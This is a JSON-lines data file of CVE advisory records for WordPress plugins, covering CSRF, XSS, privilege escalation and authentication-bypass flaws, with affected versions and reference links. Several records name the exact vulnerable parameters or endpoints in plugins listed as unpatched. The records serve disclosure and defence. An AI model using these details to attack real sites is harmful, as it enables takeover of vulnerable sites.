{"CVE_ID":"CVE-2024-7984","slug":"joy-of-text","versionImpact":"2.3.1","description":"The Joy Of Text Lite  WordPress plugin through 2.3.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07684ecb-5662-4412-8190-7957cfcf7bd3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/07684ecb-5662-4412-8190-7957cfcf7bd3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4631","slug":"profitori","description":"The Profitori plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the stocktend_object endpoint in versions 2.0.6.0 to 2.1.1.3. This makes it possible to trigger the save_object_as_user() function for objects whose '_datatype' is set to 'users',. This allows unauthenticated attackers to write arbitrary strings straight into the user\u2019s wp_capabilities meta field, potentially elevating the privileges of an existing user account or a newly created one to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2675\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2675\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2679\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2679\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2698\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L2698\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L3673\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profitori\\\/tags\\\/2.1.1.3\\\/profitori.php#L3673\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profitori\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profitori\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c764811f-e9dc-4c3d-b696-5792e70f
f0b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c764811f-e9dc-4c3d-b696-5792e70ff0b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6041","slug":"ycontributors","versionImpact":"0.5","description":"The yContributors plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.5. This is due to missing or incorrect nonce validation on the 'yContributors' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ycontributors\\\/trunk\\\/ycontributors_admin.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ycontributors\\\/trunk\\\/ycontributors_admin.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd61124-d4af-4c88-be96-579c735b7b49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd61124-d4af-4c88-be96-579c735b7b49?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8391","slug":"magic-edge-lite-image-background-remover","versionImpact":"1.1.6","description":"The Magic Edge \u2013 Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018height\u2019 parameter in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/magic-edge-lite-image-background-remover\\\/tags\\\/1.1.6\\\/MagicEdgeFrontend.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/magic-edge-lite-image-background-remover\\\/tags\\\/1.1.6\\\/MagicEdgeFrontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-edge-lite-image-background-remover\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magic-edge-lite-image-background-remover\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe456de4-4bf3-45aa-938d-8d4561fac44e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe456de4-4bf3-45aa-938d-8d4561fac44e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1865","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check when resetting plugin settings via the yrc_nuke GET parameter in versions up to, and including, 1.2.3. This makes it possible for unauthenticated attackers to delete YouTube channels from the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34817e32-d5a3-403a-85f0-1d60af8945de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34817e32-d5a3-403a-85f0-1d60af8945de?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L772\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L772\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2781","slug":"woo-confirmation-email","versionImpact":"3.5.0","description":"The User Email Verification for WooCommerce plugin for WordPress is vulnerable to authentication bypass via authenticate_user_by_email in versions up to, and including, 3.5.0. This is due to a random token generation weakness in the resend_verification_email function. This allows unauthenticated attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Allow Automatic Login After Successful Verification setting to be enabled, which it is not by default.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L506\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L506\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e31357-7fbc-414b-a4f4-53fa5f2fc715?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1e31357-7fbc-414b-a4f4-53fa5f2fc715?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L143\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L143\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-confirmation-email\\\/tags\\\/3.5.0\\\/public\\\/class-xlwuev-woocommerce-confirmation-email-public.php#L332\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3325","slug":"cms-commander-client","versionImpact":"2.287","description":"The CMS Commander plugin for WordPress is vulnerable to authorization bypass due to the use of an insufficiently unique cryptographic signature on the 'cmsc_add_site' function in versions up to, and including, 2.287. This makes it possible for unauthenticated attackers to change the '_cmsc_public_key' in the plugin config, providing access to the plugin's remote control functionalities, such as creating an admin access URL, which can be used for privilege escalation. This can only be exploited if the plugin has not been configured yet; however, if combined with another arbitrary plugin installation and activation vulnerability, the impact can be severe.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca37d453-9f9a-46b2-a17f-65a16e3e2ed1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca37d453-9f9a-46b2-a17f-65a16e3e2ed1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cms-commander-client\\\/tags\\\/2.287\\\/init.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cms-commander-client\\\/tags\\\/2.287\\\/init.php#L88\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2927811\\\/cms-commander-client\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2927811\\\/cms-commander-client\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5621","slug":"wp-responsive-slider-with-lightbox","versionImpact":"1.0","description":"The Thumbnail Slider With Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Title field in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/547c425d-8b0f-4e65-8b8a-c3a3059301fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/547c425d-8b0f-4e65-8b8a-c3a3059301fe?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6493","slug":"depicter","versionImpact":"2.0.6","description":"The Depicter Slider \u2013 Responsive Image Slider, Video Slider & Post Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the 'save' function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. CVE-2023-51491 appears to be a duplicate of this issue.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c907ea-3ab4-4674-8945-ade4f6ff2679?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c907ea-3ab4-4674-8945-ade4f6ff2679?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013596\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/Settings\\\/Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013596\\\/depicter\\\/trunk\\\/app\\\/src\\\/WordPress\\\/Settings\\\/Settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4730","slug":"ladipage","versionImpact":"4.3","description":"The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init_endpoint() function hooked via 'init' in versions up to, and including, 4.3. This makes it possible for unauthenticated attackers to modify a variety of settings. An attacker can directly modify the 'ladipage_key' which enables them to create new posts on the website and inject malicious web scripts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c4baf2e-7f5e-4954-88f9-76d32f297aab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c4baf2e-7f5e-4954-88f9-76d32f297aab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L187\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8730","slug":"exit-notifier","versionImpact":"1.9.1","description":"The Exit Notifier plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddc1aedb-e64f-4b61-a247-c3cdc731f001?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddc1aedb-e64f-4b61-a247-c3cdc731f001?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exit-notifier\\\/trunk\\\/includes\\\/class-exit-notifier-settings.php#L707\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exit-notifier\\\/trunk\\\/includes\\\/class-exit-notifier-settings.php#L707\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10016","slug":"file-upload-types","versionImpact":"1.4.0","description":"The File Upload Types by WPForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17988a66-5b48-4f57-96f8-74e539bc875e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17988a66-5b48-4f57-96f8-74e539bc875e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-upload-types\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-upload-types\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3174398%40file-upload-types&old=3119996%40file-upload-types&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3174398%40file-upload-types&old=3119996%40file-upload-types&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174398\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174398\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6628","slug":"all-contact-form-integration-for-elementor","versionImpact":"2.9.9.9","description":"The EleForms \u2013 All In One Form Integration including DB for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.9.9. This is due to missing or incorrect nonce validation when deleting form submissions. This makes it possible for unauthenticated attackers to delete form submissions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c21f5461-9c1e-48ec-b15f-6a9be1e27b43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c21f5461-9c1e-48ec-b15f-6a9be1e27b43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/all-contact-form-integration-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/all-contact-form-integration-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11690","slug":"live-stock-prices-for-wordpress","versionImpact":"1.10.3","description":"The Financial Stocks & Crypto Market Data Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'e' parameter in all versions up to, and including, 1.10.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/live-stock-prices-for-wordpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/live-stock-prices-for-wordpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/210e9d94-ae2a-4dd9-a151-0bafbac68d18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/210e9d94-ae2a-4dd9-a151-0bafbac68d18?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13711","slug":"pollin","versionImpact":"1.01.1","description":"The Pollin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'question' parameter in all versions up to, and including, 1.01.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pollin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pollin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4beb01c1-2144-4b1f-9d32-cf2725a8d4ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4beb01c1-2144-4b1f-9d32-cf2725a8d4ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13895","slug":"code-snippets-cpt","versionImpact":"2.1.0","description":"The The Code Snippets CPT plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/code-snippets-cpt\\\/trunk\\\/lib\\\/CodeSnippitButton.php#L201\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/code-snippets-cpt\\\/trunk\\\/lib\\\/CodeSnippitButton.php#L201\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65f521f4-1968-4c43-a3f0-b0f81632d7aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65f521f4-1968-4c43-a3f0-b0f81632d7aa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3814","slug":"tax-switch-for-woocommerce","versionImpact":"1.4.2","description":"The Tax Switch for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class-name\u2019 parameter in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tax-switch-for-woocommerce\\\/tags\\\/1.4.0\\\/includes\\\/class-wdevs-tax-switch-block.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tax-switch-for-woocommerce\\\/tags\\\/1.4.0\\\/includes\\\/class-wdevs-tax-switch-block.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277044\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277044\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tax-switch-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tax-switch-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e290f1aa-d20a-4e76-b77b-3e5b79e9d379?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e290f1aa-d20a-4e76-b77b-3e5b79e9d379?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7769","slug":"clicksold-wordpress-plugin","versionImpact":"1.90","description":"The ClickSold IDX WordPress plugin through 1.90 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/198252c2-834b-401b-98a5-2f59910d67bc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/198252c2-834b-401b-98a5-2f59910d67bc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4607","slug":"psw-login-and-registration","versionImpact":"1.12","description":"The PSW Front-end Login & Registration plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.12 via the customer_registration() function. This is due to the use of a weak, low-entropy OTP mechanism in the forget() function. This makes it possible for unauthenticated attackers to initiate a password reset for any user, including administrators, and elevate their privileges for full site takeover.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L731\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/psw-login-and-registration\\\/trunk\\\/public\\\/class-prositegeneralfeatures-public.php#L731\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/psw-login-and-registration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/psw-login-and-registration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2d6e595-0682-4a41-a432-afbcb50144e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2d6e595-0682-4a41-a432-afbcb50144e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6039","slug":"processingjs-for-wp","versionImpact":"1.2.2","description":"The ProcessingJS for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pjs4wp' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/processingjs-for-wp\\\/trunk\\\/processingjs-for-wp.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/processingjs-for-wp\\\/trunk\\\/processingjs-for-wp.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcda8a7a-40e3-416e-940a-ba0245dcaa7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcda8a7a-40e3-416e-940a-ba0245dcaa7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4783","slug":"youtube-channel-gallery","versionImpact":"2.4","description":"The Youtube Channel Gallery WordPress plugin through 2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38e4c7fe-94d5-48b9-8659-e114cbbb4252\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38e4c7fe-94d5-48b9-8659-e114cbbb4252\",\"refsource\":\"MISC\",\"tags\":[]}]"}
